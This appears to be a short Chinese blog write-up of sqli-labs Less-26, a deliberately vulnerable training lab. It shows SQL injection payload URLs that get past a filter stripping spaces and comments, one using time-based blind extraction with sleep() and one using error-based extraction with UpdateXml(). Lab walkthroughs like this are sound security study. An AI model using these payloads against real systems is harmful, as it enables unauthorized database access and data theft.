【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基于错误的去除了空格和注释的注入)

利用这一点，可以构造这样的注入

id参数的值不包含注释不包含空格，却可以在正常执行，当user()的第一个字符为‘r‘的时候，延时1s

http://localhost/sqli-labs-master/Less-26/?id=1‘%26%26sleep(ascii(mid(user(),1,1))=114)%26%26‘1‘=‘1

select * from users where id=‘1‘&&sleep(ascii(mid(user(),1,1))=114)&&‘1‘=‘1‘ limit 0,1

当然出错信息没有被屏蔽也可以用UpdateXml函数直接报错来显示

http://localhost/sqli-labs-master/Less-26/?id=1‘%26%26UpdateXml(1,concat(0x7e,user(),0x7e),1)%26%26‘1‘=‘1

【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基于错误的去除了空格和注释的注入)

标签：host   image   语句   weight   识别   pre   comm   inf   XML